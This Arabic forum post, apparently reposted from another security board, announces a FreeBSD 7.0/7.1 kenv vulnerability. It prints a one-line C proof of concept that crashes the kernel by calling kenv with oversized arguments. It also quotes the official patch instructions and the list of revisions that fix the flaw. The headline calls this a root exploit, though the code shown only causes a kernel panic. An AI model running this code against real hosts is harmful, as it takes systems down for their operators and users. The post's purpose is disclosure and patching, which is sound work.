FreeBSD >= 7.0 local kernel root exploit 2009
الســــلام عليكم ...
حبيت انقل لكم خبر ظهور لوكل جديد توه بانزل بمواقع السيكيورتي للنظام فري بي سي دي FreeBSD 7.0/1
يعمل على الأنظمة التاليه ...
كود:* - Tested on: FreeBSD 7.0 * FreeBSD 7.1
------
بلإضافة للوكل Kernel Panic DoS Exploit
الثغره بسيطة وانما هي فقط .
FreeBSD Local root 7.0/1كود:#include <kenv.h> #include <stdio.h> void main(){ kenv(KENV_DUMP,NULL,123123123,123123123); }
Local Kernel Panic DoS
Exploit
طبعا بلنسبة للترقيع من مصدر الFreeBSD
كود:a) Download the patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/EN-09:01/kenv.patch # fetch http://security.FreeBSD.org/patches/EN-09:01/kenv.patch.asc b) Apply the patch. # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. CVS: Branch Revision Path - ------------------------------------------------------------------------- RELENG_7 src/sys/kern/kern_environment.c 1.47.2.1 RELENG_7_1 src/UPDATING 1.507.2.13.2.7 src/sys/conf/newvers.sh 1.72.2.9.2.8 src/sys/kern/kern_environment.c 1.47.6.2 RELENG_7_0 src/UPDATING 1.507.2.3.2.15 src/sys/conf/newvers.sh 1.72.2.5.2.15 src/sys/kern/kern_environment.c 1.47.4.1 - ------------------------------------------------------------------------- Subversion: Branch/path Revision - ------------------------------------------------------------------------- stable/7/ r190301 releng/7.1/ r190301 releng/7.0/ r190301 - -------------------------------------------------------------------------
ياليت يتم تنبيه اصحاب الإستضافات للموضوع ضروري جدا بلطبع !
الموضوع منقول من منتديات قواعـــد الحمـــاية
المصـــــــدر
تحياتي
رد مع اقتباس
